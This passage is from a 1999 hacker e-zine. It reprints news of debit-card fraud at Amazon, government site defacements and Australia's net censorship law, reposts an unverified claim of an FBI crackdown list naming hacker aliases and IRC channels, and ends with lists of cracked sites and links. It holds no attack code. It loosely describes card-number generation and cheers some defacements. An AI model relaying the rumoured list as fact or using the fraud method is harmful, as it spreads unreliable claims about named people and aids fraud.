By Molly Masland
MSNBC
June 24 When Internet investigator Don
Garlock�s bank account was mysteriously cleaned
out in early June, the last thing he expected was
that the search for the culprit would take him on a
shadowy trail through cyberspace. The clues
began at online retail giant Amazon.com and led to
a ring of alleged hackers in Bangkok, Thailand.
Along the way, Garlock picked up crucial lessons
about the perils of online shopping, even at sites
that claim to be "100 percent safe."
A CONSULTANT for the Bedford County Sheriff�s
Department in Bedford, Va., Garlock works for Operation
Blue Ridge Thunder, a program aimed at stopping crimes
against children on the Internet. Garlock has logged hundreds
of hours hunting down pedophiles and child pornographers
online.
So when his personal bank account was suddenly
emptied in early June, Garlock put his online tracking skills to
the test. But even he was surprised by what he discovered.
FRAUDULENT CHARGES AT AMAZON
According to Mainstreet Bank Group, Garlock�s bank,
someone had purchased nearly $1,400 worth of merchandise
at Amazon.com and charged it to his debit card account.
When the mysterious charges at Amazon.com appeared,
Garlock immediately suspected fraud and called the online
retailer of books and music to find out who was responsible.
But Garlock was astonished to find that Amazon.com would
not release any information to him about his account.
A customer of several years, Garlock had placed modest
orders in the past, spending a total of $160, and had never
had an unpleasant shopping experience at the online retailer�s
site. But Amazon.com would neither release the name of the
individual who had purchased the goods using his debit card
number nor tell Garlock what specific merchandise had been
bought or where it had been shipped.
Amazon.com spokesman Paul Capelli said the company
makes it a policy to release detailed information about an
account only to a customer�s bank, which can then release
the details to their client. �We want to take reasonable steps
to protect our customers� privacy,� said Capelli. �We need to
know we�re dealing with the real customer, not someone
calling on the phone who could be anyone.�
As a result, the only information Garlock received
directly was a hint accidentally leaked over the phone by a
customer service representative.
�They let slip the first half of the e-mail address, and
then they realized what they had done and put me on hold.
They came back and read me a prepared response to the
effect that they could not divulge any additional information to
me,� said Garlock.
TRAIL TO THAILAND
Frustrated, Garlock was determined to proceed with his
own investigation. While his bank began an official inquiry
into the case with Amazon.com, Garlock went to work.
Using the limited information he had obtained from
Amazon.com, he uncovered a path of clues leading to a ring
of alleged computer hackers in Bangkok, Thailand. The first
part of the e-mail address given to him contained �an unusual
word and turned out to be what is a very common first name
in that part of the world,� he said.
Garlock was able to uncover a wealth of personal
information about the individuals who had used his card.With
the help of ordinary search engines, he uncovered their home
addresses, phone numbers and where they attended college.
Garlock also found that in addition to having multiple e-mail
addresses and Web sites touting their hacking skills, the
alleged thieves held legitimate Web development jobs.
�We know a tremendous amount of personal,
professional and business-type information on these people
now from our investigations here in little old Bedford
County,� said Sheriff Michael Brown.
Eventually Amazon.com released the shipping address
and fraudulent e-mail address used by the credit card thieves
to Garlock�s bank, but by then the information only confirmed
the data he had already uncovered.
Because the sheriff�s office has no jurisdiction in
Thailand, the department turned the case over to Interpol, the
international crime investigation agency that works with
federal law enforcement agencies and national police forces.
Garlock�s case is under review and, according to Brown, will
most likely be turned over to the FBI, U.S. Customs or the
Secret Service.
MORE CASES OF FRAUD
�From the time
there has been
credit cards, there
has been credit
card fraud. Bad
things can happen
any place and the
Internet is no
different.�
PAUL CAPELLI
Amazon.com spokesman
In an e-mail sent to Garlock, Amazon.com�s
investigations department confirmed that the charges made to
his debit card were indeed �the result of unauthorized use.�
Mainstreet Bank Group said an investigations officer at
Amazon.com admitted that the same group in Thailand had
set up a number of other stolen credit card numbers for use
at the retailer�s site.
In a memo obtained by MSNBC, Shirley Schoefield, a
bank investigations officer at Mainstreet Bank Group, said
that �according to the investigations department at Amazon,
approximately 20 cards have been set up for use to purchase
merchandise to be sent to the following shipping address (in
Thailand).� Citing customer privacy restrictions, Schoefield
refused to comment on the case.
Amazon.com�s Capelli also refused to comment on the
case of the 20 fraudulent credit cards, but acknowledged that
there have been instances of credit card misuse at the site.
�From the time there has been credit cards, there has been
credit card fraud. Bad things can happen any place, and the
Internet is no different. Any retailer encounters this
problem,� he said.
However, he insisted that Amazon.com�s security
system had never been compromised. Currently
Amazon.com is advertising for positions in its fraud
investigation department. Under the section �employment
opportunities� on its Web site, Amazon.com is looking for a
�fraud detection specialist� as well as a �fraud detection
manager.�
�DON�T USE A DEBIT CARD�
Garlock�s situation was made worse by the fact that his
debit card number was stolen instead of a credit card. If his
credit card had been used fraudulently, according to federal
regulations, he could have easily stopped payment on the
account and would have been held responsible for no more
than $50.
But since his debit card was stolen, he temporarily lost
everything in his checking account. When a debit card is
used, the money is automatically removed from the account
when the order is processed. While the bank is still
responsible for paying Garlock back, he must wait until the
official investigation is complete, a process that can take
weeks and sometimes months.
�One of the biggest lessons I�ve learned from this is, for
God�s sake, don�t use a debit card on the Internet,� said
Garlock.
Amazon.com has a policy of fully refunding unauthorized
charges billed to a customer�s account and has agreed to pay
back Garlock any amount billed to his account that is not
covered by his bank.
HACKER AND/OR THIEF?
While it is clear that Garlock�s debit card number was
stolen and used illegally, what remains unknown is whether
the thieves first obtained the number by breaking into
Amazon.com�s site, or whether the numbers were obtained
from another source or even generated randomly.
Amazon.com�s Capelli said that hackers have never
broken into the company�s site or stolen information on
individual accounts.
�Our system of storing credit card information has not
been compromised, nor has it ever been compromised in any
way. Any claims to this effect are not true � absolutely not
true,� said Capelli.
According to Inspector Earl Wismer of the San
Francisco Police Department, which handles many cases of
Internet fraud, �It�s really difficult to pin down where exactly
a credit card number was acquired. It is common for credit
card numbers to be fraudulently used on the Web, but we�re
not able to determine whether the numbers were obtained
from the Web or from some other source.�
In addition to stealing credit card numbers the
old-fashioned way, such as acquiring the number from
receipts, there are several sites on the Web where hackers,
or anyone else who�s interested, can generate legitimate
credit card numbers based on algorithms, or mathematical
formulas, used by banks. The algorithms generate all the
numbers used by a given bank, but the hacker must then
systematically try out each number in an effort to find one
that is in current use and still has an available credit limit.
CROSS CHECKS NEEDED
Garlock�s case is worrisome because no matter how his
debit card number was acquired, the user was still able to
charge a hefty amount of merchandise to a debit card
account owned by a person living in the Blue Ridge
Mountains of Virginia and have it shipped to an address in
Bangkok without any alarm bells going off at Amazon.com.
�Apparently their order confirmation system that would
match a card number to a given individual is seriously
flawed,� said Garlock.
According to Capelli, the person who fraudulently used
Garlock�s debit card set up a separate account using the card
number, but did not break into Garlock�s existing account.
Capelli dismissed the need for a more thorough cross
check of credit card numbers with existing account
information adding that �it is very common to have more than
one account per card number. For instance, there are
husbands and wives with different names who have different
accounts but use the same card number. Or parents who let
their children use their credit card number to set up an
account.�
As Scambusters, an online consumer advocacy
organization, points out, the reality is that it�s actually much
safer to enter a credit card number on a secure online order
form than it is to give a credit card to a waiter at a
restaurant.
But there are important security measures to be worked
out before the process is 100 percent safe, despite what
many online sites want customers to believe.
"There is definitely a problem and I think some
people in the industry have known that it is a problem. It is
not one that�s going to be fixed easily,� said Sheriff Brown.
�Consumers have just got to be careful.�
@HWA
33.0 New Definition of 'Computer Hacker'
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
June 30th
From HNN http://www.hackernews.com/
contributed by mortel
A woman in Grafton Ohio has redefined the term
'computer hacker'. Twenty nine year old Kelli Michetti,
upset that her husband was spending too much time
online took a meat cleaver and attacked the home
computer. She was fined $200 for her actions.
CBS News
http://www.cbs.com/flat/story_164947.html
@HWA
34.0 Hackers In the Workplace
~~~~~~~~~~~~~~~~~~~~~~~~
July 1st
From HNN http://www.hackernews.com/
contributed by Whoever
Security companies claim that they do not hire hackers.
In reality are they actually actively recuiting hackers?
Are they doing this because they know that not only
are they the most knowledgeable but also the most
loyal and hard working? A new HNN exclusive Buffer
Overflow article examines these questions and more.
Buffer Overflow
http://www.hackernews.com/orig/buffero.html
@HWA
35.0 NPR Covers .gov/.mil Defacements.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
July 2nd
From HNN http://www.hackernews.com/
contributed by oolong
In a rare moment of media impartiality, NPR's Morning
Edition yesterday broadcast an article about the latest
.gov breaking that featured an interview with Attrition
staff. This interview properly puts the blame of the
hacked pages on poor web server maintenance. This
article is in Real Audio format. Kudos to Morning Edition
for being fairly impartial, hopefully it will not be too
much to ask other outlets to follow their example.
NPR - print
http://www.npr.org/news/tech
NPR - Real Audio
http://www.npr.org/ramfiles/me/19990630.me.03.ram
" Hackers Strike Again Over the past month, there has been a
rash of computer hacker attacks on government web sites including the
White House, the FBI, and the Senate.Earlier this week they hit the Army's site
and Wednesday the National Oceanic and Atmospheric Administration's
Storm Prediction Center Web site was disabled. In some cases, the hackers
were able to exploit computer systems that have not kept up to date with
Internet security alerts. Hear more as NPR's John McChesney reports for Morning
Edition. "
36.0 Australia Passes Major Net Censorship Law
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
July 2nd
From HNN http://www.hackernews.com/
contributed by photon
Australian Parliament has created one of the world's
most far-reaching online censorship laws. The
Broadcasting Services Amendment Act will institute a
rating system for Internet content. The Australian
Broadcasting Authority will order ISPs to take down
content on their servers rated X (Sexually Explicit) or RC
(Refused Classification) within 24 hours of being
notified. Opponents who failed to prevent the bills
passing hope that the decentralized nature of the
internet will prove to be uncontrollable by this new law.
One loophole in the law is already being exploited,
regulators forgot to include anonymous proxy services in
the legislation.
Wired
http://www.wired.com/news/news/politics/story/20499.html
MSNBC
http://www.msnbc.com/news/285849.asp
Broadcasting Services Amendment Act
http://www.ozemail.com/~mbaker/amended.html
Australian Broadcasting Authority
http://www.aba.gov.au/
Wired;
Australian Net Censor Law Passes
by Stewart Taggart
8:15 a.m. 30.Jun.99.PDT
CANBERRA, Australia -- The political leaders of this nation on Wednesday
passed into law one of the world's most far-reaching online content censorship
regimes.
The rules -- which take effect 1 January, 2000 -- enable Australian government
regulators to order domestic Internet service providers (ISPs) to take down
indecent or offensive Web sites housed on their servers, and also require they
block access to certain domestic or overseas-based content.
"We're on fairly new ground here," said Stephen Nugent, special projects
manager for the Australian Broadcasting Authority (ABA). "The codes of practice
envisaged under this legislation are probably more detailed, and cover a
greater range of matters, than I have seen in any other country."
Known as the "Broadcasting Services Amendment (Online Services) Act", the
measure was approved by the House of Representatives late Wednesday night,
according to a staffer in the office of Communications Minister Richard
Alston. The measure had passed the more contentious Australian Senate on 26 May.
The new law will institute a movie-like rating system for Internet content. The
ABA will order ISPs to take down content on their servers rated X (Sexually Explicit)
or RC (Refused Classification) within 24 hours of being notified.
For opponents of online content restrictions, the struggle will now shift to
cyberspace itself. They believe the Internet simply will prove too large, too
decentralized, and too fast-moving for regulators anywhere to successfully block
access to any content for long.
Among the defiant is Perth-based online entrepreneur Bernadette Taylor. Known
to her Web site admirers as a "Virtual Girlfriend," she offers nude photos of
herself and personalized email communication to paying members.
To Taylor, passage of the law merely begins a hide-and-seek game she
professes little doubt she'll win. With a Web site housed in Dallas, Texas, she
plans to stay one step ahead of the nation's blocking mechanisms for as long
as the law lasts.
"With a bit of effort the ABA could find (and block) me every day but they'd have
to spend five to 10 minutes doing it," she says. "In the meantime, I'm compiling a
mail list which has all the people that want notification of where I am."
She believes her Australian-based users will encounter little ongoing difficulty
accessing her site, either through using encryption software or through proxy
servers that disguise the source of material.
One such proxy server has been set up by South Australian Web site builder and
e-commerce businessman Mike Russell. By visiting www.whois.com.au, Australian
Web users will be able to access any site they want without disclosing where
they're visiting.
Since banning proxy servers isn't included in the legislation, Russell says there will
be little Australian regulators can do.
Among other defiant gestures, Russell is calling for a worldwide boycott by Web
sites of visitors from "gov.au" domains -- recommending all such visitors be
redirected by webmasters to the home page of Electronic Frontiers Australia, the
online civil liberties group that spearheaded a failed effort to stop the
law.
In introducing the online content legislation, the center-right government
of Prime Minister John Howard argued that some controls are needed to limit
access by children to pornographic content on the Internet, as well as other
material that could be deemed offensive.Passage of the law comes amid research
showing Internet use is rising rapidly in Australia. Figures released Wednesday by
the Australian Bureau of Statistics showed nearly 18 percent of Australia's
households now have some form of Internet access -- a rise of nearly 50
percent in one year. Nearly 40 percent of Internet households in Australia now
access the Internet on a daily basis, the researchers found.
To Grant Bayley, a Sydney spokesman for 2600 Australia, an organization of
technology enthusiasts, the fact that the law comes into force on 1 January, 2000
provides at least one indication that Australian lawmakers may not have been
fully cognizant on all the issues involved.
"January 1 is not going to be one of the best days in the world to implement this,"
he said, referring to the long-feared Year 2000 problem in which worldwide
computers may start acting up due to the millennial date change.
"There are going to be much bigger problems around," he said.
@HWA
37.0 Hacker Crackdown, is your nick on this list??
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From www.rewted.org
Fbi releases hacker list -- saturday june 27 -- 11:00 sct
The FBI has started an all-out war on hackers and the like, they have received monetary funds from the
government and are monitoring many servers, there is a possiblity they are monitoring a few EFnet
servers, but other than that agents go online posed as regular people. They also are monitoring DALnet
and are considering going on UnderNet next. Watch your backs. With the funding, the FBI has invested in
much equipment and software for many things, but the main thing it goes toward is _REWARDS_. If you
provide the FBI with information leading to the prosecution of a hacker you are rewarded $5,000-10,000,
and they are targeting many young people in groups. Their tactic with young people is to scare them with
lines such as: "Are you gonna cough up the info on your buddy or be the first 13-year-old in federal
prison?" So groups, watch your little ones.
check the list out below
IRC Server: teen.vdi.net Channel #crackdown
----------------------------------------------------------------------------
The FBI has started an all-out war on hackers and the like, they have
received monetary funds fron the government and are monitoring many
servers, there is a possiblity they are monitoring a few EFnet servers,
but other than that agents go online posed as regular people. They also
are monitoring DALnet and are considering going on UnderNet next. Watch
your backs.
With the funding, the FBI has invested in much equipment and software for
many things, but the main thing it goes toward is _REWARDS_. If you
provide the FBI with information leading to the prosecution of a hacker
you are rewarded $5,000-10,000, and they are targeting many young people
in groups. Their tactic with young people is to scare them with lines such
as: "Are you gonna cough up the info on your buddy or be the first
13-year-old in federal prison?" So groups, watch your little ones.
----------------------------------------------------------------------------
AntiOnline Receives Directives
Thursday, May 27, 1999 at 11:59:27
by John Vranesevich - Founder of AntiOnline
AntiOnline has recieved directives given to several ISPs listing the groups
of hackers and hackgroups that they're currently targeting. Sources faxed
AntiOnline the 6 page directive which begins:
You are hereby requested to preserve, under provisions of Title 18, United
States Code, Section 2703(a)(unopened e-mail), (b)(content),(c)(logs and
records), and (f)the following records in your custody and control,
including records stored on backup media:
The request then goes on for 6 pages listing hacker, groups, and media
currently under investigation by the FBI. The list contains not only the
hacker's handles, but in most cases, their real names. For the privacy of
those involved, AntiOnline is only publishing their aliases. Here is a
partial list of the individuals on that list:
Sate
mz_chick
epoh
Anacarda
kimmie
badfrog
Becky
iCBM
rox
Code0
Codex
Sygma
Cyberfire
DigitalX
Ibanez
Spaceg0at
Downfall
Duk0r
elf
solarix
VectorX
f00t
f0nz
ganja
Vie
IO
Cl0pz
Bladex
vallah
jenna
coolio
hamster
prym
tr0n
lure
LD
shortee
LongDistance
lothos
blackhappy
darkfaery
crazygyrl
Diesl0w
blanc
09
Acidkill
Phear
nonlinea
optic
Overdose
P0rt
MostHated
fryz
hyrid
ghost
Rizzy
prophet
shdwknght
sidney
status
taylor
Texan
Borgie
d0lz
timebomb
Blakforge
Type-0
watchy
wolf303
wookie
Yorph
random
totempole
cyberf|re
jos
Mcintyre
Eckis
Twisted--
Pantera
angelo
espionage
fenderkev
ne0h
digital-
ID-50
taylor
cult_hero
socked
problem
mal_vu
minos
series
ben-z
rslink-
judy
The directive goes on to request information to:
Directories, files, logs, records, information or any data concearning IRC
Channels visited by Hackers or individuals listed in paragraph 1,
specifically:
It goes on to list the following IRC Channels:
#creep
#j00nix
#tk
#pascal
#ex0dus
#faggotsex
#gayfagsex
#gaysex
#hackunix
#hax0r
#lezbiandsex
#linux
#sex_gay
#sex_pl
#shellx.log
Section 5 of the directive requests:
Directories, files, programs, logs, or data concearning the Names of hacker
groups:
This section goes on to list:
GlobalHell
gH
milw0rm
Total-ka0s
tk
Darkcyde
D4rkcyde
2600
world domination
enforcers
enphorcers
hackphreak
Section 7 requests:
Victim names or known victim identifying numbers, such as names, addresses,
and teleophone numbers, concerning the Individuals listed in paragraph 1, or
listed below:
Section 7 goes on to list:
Meeting Place
At&T
Latitude
Sprint
MCI
GTE
Alltell
Steve Huron
Josh Teplow
1-800-
1-888-
DCCCD
LCET
Walburg
Dillon
Reed
3-com
3com
arizona.edu
umich.edu
uchicago.edu
udel.edu
uga.edu
uwashington.edu
As ALWAYS, AntiOnline will bring you the latest information as it becomes
available.
IRC Server: teen.vdi.net Channel #crackdown
----------------------------------------------------------------------------
FBI lurking on IRC
May, 30 1999 - 22:07
contributed by: BinaryZer0
>From an unidentified source, I, and others, have been told to keep quiet on
IRC's EFnet, especially the lagged.org servers. Why? It is possible that the
FBI received cooperation from lagged.org officials, and the FBI is now
sniffing the server. It is possible that they are sniffing out words like
"hack" with a similar type of contraction as "grep". This is due to the
recent hacks of government sites, and the envolvement of gH members (who
hang out on EFnet).
Further details will, somehow, be investigated.
IRC Server: teen.vdi.net Channel #crackdown
----------------------------------------------------------------------------
As I have been told, a few people were raided a few weeks back:
Becky-
fryz
MostHated
Nothing really has been pinned on them.
More can be discussed on the IRC server, teen.vdi.net, port 6667
in channel #crackdown.
-missnglnk
@HWA
-=--=--=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-
T E R M U M L
H U O R I L
-=--=--=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-
Rumours:
~~~~~~~
Send rumours to hwa@press.usmc.net, or join our irc channel and gossip!! tnx ..
+ www.403-security.org has had a facelift, check out the new look and leave your comments to
astral on how you like it...
+ Help! net-security is changing servers and may be down for a few days while they overcome
some new server teething problems (probably dns related).see elsewhere this issue for more
details ...
+ HNN: contributed by Space Rogue, HNN hopes everyone has a fun filled Fourth of July weekend.
Note, that there will be no news update on Monday. Be sure to check in next week as we
attempt to update the site remotely from Defcon7 in LasVegas.
We should be ready to announce the HNN T-shirts that everyone has been asking for on Tuesday.
Oh, and SETI@Home released version 1.5 of the SETI software last Wednesday which fixes quite a
few bugs. (with all the news lately we forgot to mention it). Be sure to join up with the HNN
team as you search for that Aranakin guy.
HNN Team for SETI@Home
http://setiathome.ssl.berkeley.edu/cgi-bin/cgi?cmd=team_lookup&name=The+Hacker+News+Network
AD.S ADVERTI$ING. The HWA black market ADVERTISEMENT$.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
*****************************************************************************
* *
* ATTRITION.ORG http://www.attrition.org *
* ATTRITION.ORG Advisory Archive, Hacked Page Mirror *
* ATTRITION.ORG DoS Database, Crypto Archive *
* ATTRITION.ORG Sarcasm, Rudeness, and More. *
* *
*****************************************************************************
www.2600.com www.freekevin.com www.kevinmitnick.com www.2600.com www.freekevi
n.com www.kevinmitnick.com www.2600.com www.freekevin.com www.kevinmitnick.co
m www.2600.com ########################################ww.2600.com www.freeke
vin.com www.kev# Support 2600.com and the Free Kevin #.com www.kevinmitnick.
com www.2600.co# defense fund site, visit it now! . # www.2600.com www.free
kevin.com www.k# FREE KEVIN! #in.com www.kevinmitnic
k.com www.2600.########################################om www.2600.com www.fre
ekevin.com www.kevinmitnick.com www.2600.com www.freekevin.com www.kevinmitnic
k.com www.2600.com www.freekevin.com www.kevinmitnick.com www.2600.com www.fre
<a href="http://www.2600.com/">www.2600.com</a>
<a href="http://www.kevinmitnick.com></a>
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* www.csoft.net webhosting, shell, unlimited hits bandwidth ... www.csoft.net *
* www.csoft.net www.csoft.net www.csoft.net www.csoft.net www.csoft.net *
<a href="http://www.csoft.net">One of our sponsers, visit them now</a> www.csoft.net
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* WWW.BIZTECHTV.COM/PARSE WEDNESDAYS AT 4:30PM EST, HACK/PHREAK CALL-IN WEBTV *
* JOIN #PARSE FOR LIVE PARTICIPATION IN SHOW CHAT OR THE WEBCHAT, AND WEBBOARD*
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* WWW.2600.COM OFF THE HOOK LIVE NETCAST'S TUES SIMULCAST ON WBAI IN NYC @8PM *
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
//////////////////////////////////////////////////////////////////////////////
// To place an ad in this section simply type it up and email it to //
// hwa@press,usmc.net, put AD! in the subject header please. - Ed //
//////////////////////////////////////////////////////////////////////////////
@HWA
HA.HA Humour and puzzles ...etc
~~~~~~~~~~~~~~~~~~~~~~~~~
Don't worry. worry a *lot*
Send in submissions for this section please! .............
From www.innerpulse.com ...
JP offers a public personal insite to his family
Contributed by mkatona
Tuesday - March 02, 1999. 05:09PM UTC
In an off the wall media report, AntiOnlines owner, JP, reveals personal
information to the world:
"It's no secret my Father was a famous actor. And instead of letting the
rumor mill swallow this down, I would rather tell it like it is.. Yes my
father was Beaver Cleaver."
Immediately after, JP played a Leave it To Beaver midi theme, put on a small
baseball hat and walked out. When reached by phone JP has this to say,
"Yes, AntiOnline is a hackers security site. But so what if my dad was
Beaver Cleaver. I still have to stop hackers. And please cease with the
Little Beaver emails. It's annoying and pointless. One of the reasons
AntiOnline is so successful is because my dad told me to get revenge on
the world for canceling his show. And that Beaver Cleaver dis-placed
anger still lingers in me. So you can do anything you want to.. But
remember, I have Beaver power!"
It's not sure if Wally and the rest of the whole gang are open to questions.
Last seen, Wourd Cleaver was still on AOL perfecting his scrolling skills.
The FBI has also opened a case against suspected Granny Hacker from
heck Carolyn Meinel on the grounds of dressing/looking like a crack friend
and the possibility she is Wallies long lost best friend, Eddy Haskel.
[Reporting for innerpulse.com, Innerpulse News, this is Matthew Katona
from polyester.net signing off.]
AntiOnline
http://www.antionline.com/
@HWA
SITE.1 AntiOffline
~~~~~~~~~~~
http://www.antioffline.com/ is a parody of AntiOnline which has been around
for some time now, check it out if you haven't already.
http://www.antioffline.com/
@HWA
H.W Hacked websites
~~~~~~~~~~~~~~~~
Note: The hacked site reports stay, especially with some cool hits by
groups like *H.A.R.P, go get em boyz racism is a mugs game! - Ed
* Hackers Against Racist Propaganda (See issue #7)
Haven't heard from Catharsys in a while for those following their saga visit
http://frey.rapidnet.com/~ptah/ for 'the story so far'...
From HNN rumours section http://www.hackernews.com/
see the archives section on HNN or attrition.org for copies of many of these
sites in their defaced form.
http://www.attrition.org/
June 28th
contributed by Anonymous
Cracked
A busy weekend for some. Take a look at all the .gov
sites.
http://alumni.byu.edu
http://www.campaign.co.uk
http://nauvoo.byu.edu
http://www.wallawalla.com
http://www.abscond.com
http://www-nmlc.med.navy.mil
http://www.ed.gov
http://www.casper-homes.com
http://www.deepknowledge.com
http://www.teweb.com
http://faithtabernacle.com
http://www.prulite.com
http://www.mt.gov.br
http://www.sc.gov.br
http://theserialkillers.cjb.net
http://fns1.usda.gov
http://www.fhpr8.fs.usda.gov
http://www.fsis.usda.gov
http://www.rurdev.usda.gov
http://www.happyhack.com
http://www.nacc.nasa.gov
http://www.forpc.com.au
http://www.cnic.net
http://www.bell-microsystems.com
http://www.flyfishboats.com
http://www.flyfishboats.com
http://www.heritagebank.com
http://www.petstore.com
http://microgravity.nasa.gov
http://www.forpc.com.au
http://www.kwikweb.com
June 29th
Contributed by Anonymous
Cracked
The following sites have been reported as cracked.
http://www.topaccess.com.br
http://www.nic.bo
http://ntciasc05.ciasc.gov.br
http://dbserv.ils.unc.edu
http://www.humnet.ucla.edu
http://www.cyberpimp.com
http://www.crossinit.org
http://www.coldflame.org
http://www.christfamilychurch.org
http://www.avcdirect.com
http://www.canyonriver.com
http://www.cinewave.com
http://www.computersworth.com
http://www.ctektx.com
http://www.cybertech2000.com
http://www.dfw-nt.com
http://www.graceandgrace.com
http://www.graytech.com
http://www.meusa.com
http://www.mjdistribution.com
http://www.webdallas.com
http://www.softwarewholeseller.com
http://www.shamrock-bolt.com
http://www.number14.com
June 30th
contributed by Anonymous
Cracked
The following sites has been reported as compromised.
http://www.georgeabbot.surrey.sch.uk
http://chef.fab.albany.edu
http://altpro.pdp.albany.edu
http://caster.gsfc.nasa.gov
http://www.umkc-efkc.org
http://www.spc.noaa.gov
July 1st
Keebler Elves Strike Yet Another Government Server
contributed by Code Kid
Upset by the actions of John Vranesevich of AntiOnline
and Harvard Universities overreaction the Keebler Elves
have attacked another government web site. This time
they have posted very derogatory comments about
John Vranesevich on the web site of the Bureau of
Reclamation, Rio Grande Operations.
HNN Cracked Pages Archive
http://www.hackernews.com/archive/crackarch.html
July 2nd
contributed by Anonymous
Cracked The following sites have been reported as
compromised over the last two days.
http://www.cedom.gov.ar
http://www.evolucao.com.br
http://www.colonnades.com.au
http://www.fit.org.au
http://www.tcfua.org.au
http://www.advancecleaning.com
http://www.beyond-software.com
http://www.heartlandcard.com
http://www.superwarez.com
http://www.maris.int - possible first crack of .int domain
http://www.whiterules.com
http://www.uc.usbr.gov
http://www.aao.uc.usbr.gov
http://www.hoxie.org
http://www.rbvend.com
http://www.entelnet.bo
http://www.2600.co.uk
http://www.atr.org
http://www.frontweb.com
http://resource-central.com
http://www.voris.com
http://www.cosmeticscounter.com
http://www.fragrancecounter.com
http://www.stickz.com
-------------------------------------------------------------------------
A.0 APPENDICES
_________________________________________________________________________
A.1 PHACVW, sekurity, security, cyberwar links
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
The links are no longer maintained in this file, there is now a
links section on the http://welcome.to/HWA.hax0r.news/ url so check
there for current links etc.
The hack FAQ (The #hack/alt.2600 faq)
http://www-personal.engin.umich.edu/~jgotts/underground/hack-faq.html
<a href="http://www-personal.engin.umich.edu/~jgotts/underground/hack-faq.html">hack-faq</a>
Hacker's Jargon File (The quote file)
http://www.lysator.liu.se/hackdict/split2/main_index.html
<a href="http://www.lysator.liu.se/hackdict/split2/main_index.html">Original jargon file</a>
New Hacker's Jargon File.
http://www.tuxedo.org/~esr/jargon/
<a href="http://www.tuxedo.org/~esr/jargon/">New jargon file</a>
HWA.hax0r.news Mirror Sites:
~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.csoft.net/~hwa/
http://www.digitalgeeks.com/hwa.
http://members.tripod.com/~hwa_2k
http://welcome.to/HWA.hax0r.news/
http://www.attrition.org/~modify/texts/zines/HWA/
http://packetstorm.genocide2600.com/hwahaxornews/
http://archives.projectgamma.com/zines/hwa/.
http://www.403-security.org/Htmls/hwa.hax0r.news.htm
International links:(TBC)
~~~~~~~~~~~~~~~~~~~~~~~~~
Foreign correspondants and others please send in news site links that
have security news from foreign countries for inclusion in this list
thanks... - Ed
Belgium.......: http://bewoner.dma.be/cum/
<a href="http://bewoner.dma.be/cum/">Go there</a>
Brasil........: http://www.psynet.net/ka0z
<a href="http://www.psynet.net/ka0z/">Go there</a>
http://www.elementais.cjb.net
<a href="http://www.elementais.cjb.net/">Go there</a>
Canada .......: http://www.hackcanada.com
<a href="http://www.hackcanada.com/">Go there</a>
Columbia......: http://www.cascabel.8m.com
<a href="http://www.cascabel.8m.com/">Go there</a>
http://www.intrusos.cjb.net
<a href="http://www.intrusos.cjb.net">Go there</a>
Indonesia.....: http://www.k-elektronik.org/index2.html
<a href="http://www.k-elektronik.org/index2.html">Go there</a>
http://members.xoom.com/neblonica/
<a href="http://members.xoom.com/neblonica/">Go there</a>
http://hackerlink.or.id/
<a href="http://hackerlink.or.id/">Go there</a>
Netherlands...: http://security.pine.nl/
<a href="http://security.pine.nl/">Go there</a>
Russia........: http://www.tsu.ru/~eugene/
<a href="http://www.tsu.ru/~eugene/">Go there</a>
Singapore.....: http://www.icepoint.com
<a href="http://www.icepoint.com">Go there</a>
Turkey........: http://www.trscene.org - Turkish Scene is Turkey's first and best security related e-zine.
<a href="http://www.trscene.org/">Go there</a>
Got a link for this section? email it to hwa@press.usmc.net and i'll
review it and post it here if it merits it.
@HWA
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--
� 1998, 1999 (c) Cruciphux/HWA.hax0r.news <tm> (R) { w00t }
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
[ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]
[45:6E:64]-[28:63:29:31:39:39:38:20:68:77:61:20:73:74:65:76:65]